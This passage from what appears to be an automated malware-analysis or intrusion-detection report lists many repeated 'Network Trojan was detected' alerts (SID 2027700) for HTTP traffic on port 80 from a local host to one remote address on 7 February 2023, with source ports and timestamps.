                              Source Port:49918
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450059802027700 02/07/23-23:08:40.814145
                              SID:2027700
                              Source Port:50059
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450237802027700 02/07/23-23:09:28.175009
                              SID:2027700
                              Source Port:50237
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449841802027700 02/07/23-23:07:40.291176
                              SID:2027700
                              Source Port:49841
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449974802027700 02/07/23-23:08:17.631579
                              SID:2027700
                              Source Port:49974
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450310802027700 02/07/23-23:09:47.315519
                              SID:2027700
                              Source Port:50310
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450203802027700 02/07/23-23:09:18.814519
                              SID:2027700
                              Source Port:50203
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449796802027700 02/07/23-23:07:27.783130
                              SID:2027700
                              Source Port:49796
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450114802027700 02/07/23-23:08:54.813586
                              SID:2027700
                              Source Port:50114
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450091802027700 02/07/23-23:08:48.773540
                              SID:2027700
                              Source Port:50091
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449946802027700 02/07/23-23:08:08.944668
                              SID:2027700
                              Source Port:49946
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450132802027700 02/07/23-23:08:59.313660
                              SID:2027700
                              Source Port:50132
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450002802027700 02/07/23-23:08:25.080418
                              SID:2027700
                              Source Port:50002
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449780802027700 02/07/23-23:07:23.953446
                              SID:2027700
                              Source Port:49780
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450209802027700 02/07/23-23:09:20.298654
                              SID:2027700
                              Source Port:50209
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450104802027700 02/07/23-23:08:52.249237
                              SID:2027700
                              Source Port:50104
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450012802027700 02/07/23-23:08:27.539545
                              SID:2027700
                              Source Port:50012
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450364802027700 02/07/23-23:10:00.578597
                              SID:2027700
                              Source Port:50364
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449742802027700 02/07/23-23:07:13.217594
                              SID:2027700
                              Source Port:49742
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450361802027700 02/07/23-23:09:59.837623
                              SID:2027700
                              Source Port:50361
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449745802027700 02/07/23-23:07:13.690917
                              SID:2027700
                              Source Port:49745
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450094802027700 02/07/23-23:08:49.510006
                              SID:2027700
                              Source Port:50094
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450097802027700 02/07/23-23:08:50.388048
                              SID:2027700
                              Source Port:50097
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450186802027700 02/07/23-23:09:14.607278
                              SID:2027700
                              Source Port:50186
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450438802027700 02/07/23-23:10:20.467632
                              SID:2027700
                              Source Port:50438
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449770802027700 02/07/23-23:07:21.455442
                              SID:2027700
                              Source Port:49770
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450466802027700 02/07/23-23:10:27.272312
                              SID:2027700
                              Source Port:50466
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450158802027700 02/07/23-23:09:05.696446
                              SID:2027700
                              Source Port:50158
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450336802027700 02/07/23-23:09:53.715951
                              SID:2027700
                              Source Port:50336
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450288802027700 02/07/23-23:09:41.886673
                              SID:2027700
                              Source Port:50288
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450206802027700 02/07/23-23:09:19.556589
                              SID:2027700
                              Source Port:50206
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449936802027700 02/07/23-23:08:06.480598
                              SID:2027700
                              Source Port:49936
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449847802027700 02/07/23-23:07:41.745093
                              SID:2027700
                              Source Port:49847
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449717802027700 02/07/23-23:07:07.153402
                              SID:2027700
                              Source Port:49717
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449799802027700 02/07/23-23:07:28.505366
                              SID:2027700
                              Source Port:49799
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450170802027700 02/07/23-23:09:10.682104
                              SID:2027700
                              Source Port:50170
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449819802027700 02/07/23-23:07:33.315465
                              SID:2027700
                              Source Port:49819
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449908802027700 02/07/23-23:07:59.582545
                              SID:2027700
                              Source Port:49908
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450040802027700 02/07/23-23:08:35.106092
                              SID:2027700
                              Source Port:50040
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450069802027700 02/07/23-23:08:43.290160
                              SID:2027700
                              Source Port:50069
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449920802027700 02/07/23-23:08:02.536242
                              SID:2027700
                              Source Port:49920
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450473802027700 02/07/23-23:10:29.015986
                              SID:2027700
                              Source Port:50473
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450412802027700 02/07/23-23:10:12.220070
                              SID:2027700
                              Source Port:50412
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450118802027700 02/07/23-23:08:55.823225
                              SID:2027700
                              Source Port:50118
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450216802027700 02/07/23-23:09:22.010258
                              SID:2027700
                              Source Port:50216
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449731802027700 02/07/23-23:07:10.568753
                              SID:2027700
                              Source Port:49731
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449985802027700 02/07/23-23:08:20.913010
                              SID:2027700
                              Source Port:49985
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450154802027700 02/07/23-23:09:04.744163
                              SID:2027700
                              Source Port:50154
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450249802027700 02/07/23-23:09:32.275895
                              SID:2027700
                              Source Port:50249
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450056802027700 02/07/23-23:08:40.088529
                              SID:2027700
                              Source Port:50056
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449728802027700 02/07/23-23:07:09.767109
                              SID:2027700
                              Source Port:49728
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449826802027700 02/07/23-23:07:34.986762
                              SID:2027700
                              Source Port:49826
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449882802027700 02/07/23-23:07:50.365010
                              SID:2027700
                              Source Port:49882
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449916802027700 02/07/23-23:08:01.554969
                              SID:2027700
                              Source Port:49916
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449821802027700 02/07/23-23:07:33.782681
                              SID:2027700
                              Source Port:49821
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449879802027700 02/07/23-23:07:49.589028
                              SID:2027700
                              Source Port:49879
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450417802027700 02/07/23-23:10:13.425468
                              SID:2027700
                              Source Port:50417
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450285802027700 02/07/23-23:09:41.160719
                              SID:2027700
                              Source Port:50285
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450048802027700 02/07/23-23:08:38.164092
                              SID:2027700
                              Source Port:50048
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450375802027700 02/07/23-23:10:03.233760
                              SID:2027700
                              Source Port:50375
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450121802027700 02/07/23-23:08:56.541604
                              SID:2027700
                              Source Port:50121
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450322802027700 02/07/23-23:09:50.288220
                              SID:2027700
                              Source Port:50322
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450280802027700 02/07/23-23:09:39.926138
                              SID:2027700
                              Source Port:50280
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450339802027700 02/07/23-23:09:54.482136
                              SID:2027700
                              Source Port:50339
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449797802027700 02/07/23-23:07:28.024524
                              SID:2027700
                              Source Port:49797
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449952802027700 02/07/23-23:08:10.427883
                              SID:2027700
                              Source Port:49952
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449932802027700 02/07/23-23:08:05.505650
                              SID:2027700
                              Source Port:49932
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449748802027700 02/07/23-23:07:14.403704
                              SID:2027700
                              Source Port:49748
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449929802027700 02/07/23-23:08:04.773416
                              SID:2027700
                              Source Port:49929
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450260802027700 02/07/23-23:09:35.014959
                              SID:2027700
                              Source Port:50260
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449846802027700 02/07/23-23:07:41.490813
                              SID:2027700
                              Source Port:49846
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450003802027700 02/07/23-23:08:25.325125
                              SID:2027700
                              Source Port:50003
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450174802027700 02/07/23-23:09:11.713080
                              SID:2027700
                              Source Port:50174
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449711802027700 02/07/23-23:07:05.695210
                              SID:2027700
                              Source Port:49711
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450190802027700 02/07/23-23:09:15.591790
                              SID:2027700
                              Source Port:50190
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450404802027700 02/07/23-23:10:10.231347
                              SID:2027700
                              Source Port:50404
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449965802027700 02/07/23-23:08:13.650116
                              SID:2027700
                              Source Port:49965
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450293802027700 02/07/23-23:09:43.101385
                              SID:2027700
                              Source Port:50293
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450211802027700 02/07/23-23:09:20.794111
                              SID:2027700
                              Source Port:50211
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449784802027700 02/07/23-23:07:24.915414
                              SID:2027700
                              Source Port:49784
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450437802027700 02/07/23-23:10:20.219041
                              SID:2027700
                              Source Port:50437
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450460802027700 02/07/23-23:10:25.826616
                              SID:2027700
                              Source Port:50460
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449859802027700 02/07/23-23:07:44.659899
                              SID:2027700
                              Source Port:49859
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450187802027700 02/07/23-23:09:14.862061
                              SID:2027700
                              Source Port:50187
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450105802027700 02/07/23-23:08:52.555967
                              SID:2027700
                              Source Port:50105
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450302802027700 02/07/23-23:09:45.325485
                              SID:2027700
                              Source Port:50302
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450229802027700 02/07/23-23:09:25.211609
                              SID:2027700
                              Source Port:50229
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449890802027700 02/07/23-23:07:52.300017
                              SID:2027700
                              Source Port:49890
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450141802027700 02/07/23-23:09:01.548249
                              SID:2027700
                              Source Port:50141
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450395802027700 02/07/23-23:10:08.061097
                              SID:2027700
                              Source Port:50395
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450224802027700 02/07/23-23:09:23.949840
                              SID:2027700
                              Source Port:50224
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449771802027700 02/07/23-23:07:21.708262
                              SID:2027700
                              Source Port:49771
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449895802027700 02/07/23-23:07:53.534084
                              SID:2027700
                              Source Port:49895
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449813802027700 02/07/23-23:07:31.831966
                              SID:2027700
                              Source Port:49813
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450194802027700 02/07/23-23:09:16.621524
                              SID:2027700
                              Source Port:50194
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450292802027700 02/07/23-23:09:42.847678
                              SID:2027700
                              Source Port:50292
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449903802027700 02/07/23-23:07:56.006891
                              SID:2027700
                              Source Port:49903
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450424802027700 02/07/23-23:10:15.140263
                              SID:2027700
                              Source Port:50424
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449814802027700 02/07/23-23:07:32.080927
                              SID:2027700
                              Source Port:49814
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450289802027700 02/07/23-23:09:42.121099
                              SID:2027700
                              Source Port:50289
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450035802027700 02/07/23-23:08:33.151525
                              SID:2027700
                              Source Port:50035
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450068802027700 02/07/23-23:08:43.057010
                              SID:2027700
                              Source Port:50068
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449912802027700 02/07/23-23:08:00.559985
                              SID:2027700
                              Source Port:49912
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450010802027700 02/07/23-23:08:27.035129
                              SID:2027700
                              Source Port:50010
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450362802027700 02/07/23-23:10:00.086376
                              SID:2027700
                              Source Port:50362
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449909802027700 02/07/23-23:07:59.832613
                              SID:2027700
                              Source Port:49909
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450335802027700 02/07/23-23:09:53.466997
                              SID:2027700
                              Source Port:50335
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449899802027700 02/07/23-23:07:54.525689
                              SID:2027700
                              Source Port:49899
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449997802027700 02/07/23-23:08:23.882401
                              SID:2027700
                              Source Port:49997
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449870802027700 02/07/23-23:07:47.398418
                              SID:2027700
                              Source Port:49870
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450273802027700 02/07/23-23:09:38.220730
                              SID:2027700
                              Source Port:50273
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449833802027700 02/07/23-23:07:36.871624
                              SID:2027700
                              Source Port:49833
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450049802027700 02/07/23-23:08:38.401506
                              SID:2027700
                              Source Port:50049
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449998802027700 02/07/23-23:08:24.116921
                              SID:2027700
                              Source Port:49998
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450138802027700 02/07/23-23:09:00.761131
                              SID:2027700
                              Source Port:50138
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450204802027700 02/07/23-23:09:19.062253
                              SID:2027700
                              Source Port:50204
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449839802027700 02/07/23-23:07:39.819277
                              SID:2027700
                              Source Port:49839
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449928802027700 02/07/23-23:08:04.507544
                              SID:2027700
                              Source Port:49928
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450405802027700 02/07/23-23:10:10.475956
                              SID:2027700
                              Source Port:50405
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449715802027700 02/07/23-23:07:06.670721
                              SID:2027700
                              Source Port:49715
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450306802027700 02/07/23-23:09:46.316046
                              SID:2027700
                              Source Port:50306
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449791802027700 02/07/23-23:07:26.598224
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450220802027700 02/07/23-23:09:22.982035
                              SID:2027700
                              Source Port:50220
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450223802027700 02/07/23-23:09:23.700905
                              SID:2027700
                              Source Port:50223
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450477802027700 02/07/23-23:10:29.999028
                              SID:2027700
                              Source Port:50477
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450125802027700 02/07/23-23:08:57.600771
                              SID:2027700
                              Source Port:50125
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450217802027700 02/07/23-23:09:22.244329
                              SID:2027700
                              Source Port:50217
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450036802027700 02/07/23-23:08:33.388754
                              SID:2027700
                              Source Port:50036
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450134802027700 02/07/23-23:08:59.789777
                              SID:2027700
                              Source Port:50134
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450388802027700 02/07/23-23:10:06.372796
                              SID:2027700
                              Source Port:50388
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450391802027700 02/07/23-23:10:07.091832
                              SID:2027700
                              Source Port:50391
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450474802027700 02/07/23-23:10:29.268969
                              SID:2027700
                              Source Port:50474
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450181802027700 02/07/23-23:09:13.403025
                              SID:2027700
                              Source Port:50181
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450408802027700 02/07/23-23:10:11.262817
                              SID:2027700
                              Source Port:50408
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449925802027700 02/07/23-23:08:03.782317
                              SID:2027700
                              Source Port:49925
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450092802027700 02/07/23-23:08:49.011979
                              SID:2027700
                              Source Port:50092
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450319802027700 02/07/23-23:09:49.495652
                              SID:2027700
                              Source Port:50319
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449801802027700 02/07/23-23:07:28.990558
                              SID:2027700
                              Source Port:49801
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450461802027700 02/07/23-23:10:26.066420
                              SID:2027700
                              Source Port:50461
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449972802027700 02/07/23-23:08:16.388087
                              SID:2027700
                              Source Port:49972
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450236802027700 02/07/23-23:09:27.474416
                              SID:2027700
                              Source Port:50236
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450023802027700 02/07/23-23:08:30.249609
                              SID:2027700
                              Source Port:50023
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450147802027700 02/07/23-23:09:03.026189
                              SID:2027700
                              Source Port:50147
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449883802027700 02/07/23-23:07:50.617719
                              SID:2027700
                              Source Port:49883
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450421802027700 02/07/23-23:10:14.406004
                              SID:2027700
                              Source Port:50421
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449863802027700 02/07/23-23:07:45.653673
                              SID:2027700
                              Source Port:49863
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450286802027700 02/07/23-23:09:41.402786
                              SID:2027700
                              Source Port:50286
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450029802027700 02/07/23-23:08:31.679572
                              SID:2027700
                              Source Port:50029
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449820802027700 02/07/23-23:07:33.547735
                              SID:2027700
                              Source Port:49820
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449958802027700 02/07/23-23:08:11.883807
                              SID:2027700
                              Source Port:49958
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450102802027700 02/07/23-23:08:51.747853
                              SID:2027700
                              Source Port:50102
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449817802027700 02/07/23-23:07:32.798708
                              SID:2027700
                              Source Port:49817
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
